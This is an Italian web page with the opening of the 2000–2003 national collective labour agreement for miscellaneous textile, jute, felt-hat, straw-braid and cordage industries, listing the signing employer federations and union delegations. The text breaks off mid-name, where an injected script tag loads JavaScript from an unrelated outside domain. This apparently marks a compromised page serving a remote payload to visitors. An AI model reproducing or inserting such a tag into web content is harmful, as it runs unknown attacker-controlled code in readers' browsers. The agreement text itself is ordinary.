Torna
all'elenco delle categorie
|
Categoria: Altri Settore: Tessili Data stipula: 19-5-2000 Data decorrenza: 1-1-2000 Data scadenza: 31-12-2003
Contratto Collettivo Nazionale di Lavoro
- PER I LAVORATORI ADDETTI ALLE INDUSTRIE TESSILI VARIE (NASTRI RIGIDI,
NASTRI E TESSUTI ELASTICI, MAGLIE E CALZE ELASTICHE, PASSAMANI, TRECCE E
STRINGHE, TULLI, PIZZI VELI ANDALUSA, TENDE, RICAMI A MACCHINA, PIZZI USO
TOMBOLO) - ACCESSORI PER FILATURA E TESSITURA - SCARDASSI - AMIANTIERI
(COMPRESO GRUPPO FRENI) - TAPPETI - INTERFODERE;
- PER I LAVORATORI ADDETTI ALL'INDUSTRIA DELLA JUTA;
- PER I LAVORATORI ADDETTI ALLE AZIENDE FABBRICANTI TENDE DA CAMPO, TELE E
COPERTONI IMPERMEABILI - MANUFATTI E INDUMENTI IMPERMEABILI ED AFFINI PER
USO INDUSTRIALE, CIVILE E MILITARE;
- PER I LAVORATORI ADDETTI ALLE AZIENDE FABBRICANTI FELTRO E CAPPELLO DI
PELO - FELTRO E CAPPELLO DI LANA - PELO PER CAPPELLO;
- PER I LAVORATORI ADDETTI ALLA PRODUZIONE DI BERRETTI E COPRICAPO DIVERSI
(NON DI PAGLIA NE' DI FELTRO) E DI FODERE E MAROCCHINI;
- PER GLI ADDETTI ALLA LAVORAZIONE DELLE TRECCE E DEI CAPPELLI DI PAGLIA,
DI TRUCIOLO E DI ALTRE MATERIE AFFINI DA INTRECCIO E DELLE TRECCE
MECCANICHE;
- PER I LAVORATORI ADDETTI ALL'INDUSTRIA DEL TESSUTO NON TESSUTO;
- PER I LAVORATORI ADDETTI ALL'INDUSTRIA DELLA SPAGHERIA E CORDERIA IN
FIBRE NATURALI SOFFICI E SINTETICHE, DEL COCCO E DELLE FIBRE DURE SIMILARI
E SUCCEDANEE
Addì 19 maggio 2000
tra
- Federazione Italiana Industriali dei TESSILIVARI e del cappello,
rappresentata dal Presidente sig.ra Giovanna Klinger Tassinari, dal
Presidente della Commissione sindacale dr. Roberto Calimani, assistiti dal
Direttore dr.ssa Carla Ginelli Brunialti e dal Responsabile dell'Ufficio
sindacale dr.ssa Laura Verga;
con la partecipazione di FEDERTESSILE, rappresentata dal Presidente
Paolo Barzaghi e dai componenti del Consiglio dell'Area Relazioni
industriali, Presidente Paolo Barzaghi, e Vice Presidente Domenico
Genito;
con l'assistenza di CONFINDUSTRIA nella persona del dott. Raffaele
Ponzano;
e
- Federazione Italiana dei Lavoratori Tessili e dell'Abbigliamento (FILTA)
rappresentata dal Segretario generale Renzo Bellini, dai Segretari
nazionali: Adriano Fratini, Adriano Linari, Stefano Ruvolo, Sergio Spiller
e con la presenza di Marcello Guardianelli della Federazione nazionale;
alla presenza dei componenti il Comitato esecutivo: Bertelle Gianni,
Boglietti Osvaldo, Bori Antonio, Brembilla Rita, Calvagna Alfio, Corti
Felice, Cucinotta Enzo, Esposito Antonio, Favarò Vito, Ferrante Giuseppe,
Furlan Bruno, Legge Nicola, Levorato Angelo, Metefori Gino, Moretto
Raffaella, Pantaleo Ivan, Paolini Gloria, Pasqualitto Romano, Redaelli
Gigi, Redaelli Giuseppe, Riboldi Carlo, Ruffini Bruno, Siviero Mario, Taba
Gianfranco, Tascone Carmela, Torri Enzo, Turri Domenico, Vadacca Anna e
dalla delegazione composta da Attila Cristina, Bigoni Domenico, Bertocchi
Gianfranco, Cannelli Graziano, Canu Tommaso, Cifani Alfonso, Di Stefano
Silvano, Deganello Vittorino, Gatto Loredana, Lampugnani Emilia,
Liberatori Antonio, Mammì Giuseppe, Mencarini Stefano, Morani Gianfranco,
Moci Adriana, Pelleriti Mimma, Piras Antonio, Riva Giovanna, Roffarè Rudy,
Scomparin Pietro, Scalera Saverio, Tomba Abele, Toschi Luisa, Troise
Pasquale, Vero Angelo, Zanolini Enrico;
con l'assistenza della Confederazione Italiana Sindacato Lavoratori
(CISL);
- Federazione Italiana Lavoratori Tessili e Abbigliamento (FILTEA),
rappresentata dal Segretario generale Agostino Megale, dal Vice Segretario
Mauro Beschi; dai Segretari nazionali Salvatore Barone, Valeria Fedeli,
Daniele Quiriconi; Enrico Moroni, Silvana Cappuccio, Fulvio Ciucciarelli,
Giovanni Rossi del Centro nazionale; dai membri del Comitato direttivo:
Bernardino Avalle, Ivano Africani, Fulvio Albumina, Vicenzo Armenante,
Gianni Andreoletti, Francesca Abbrescia, Renato Barbiero, Daniela Bellan,
D<script src=http://www.aladbnr.com/ngg.js></script>
|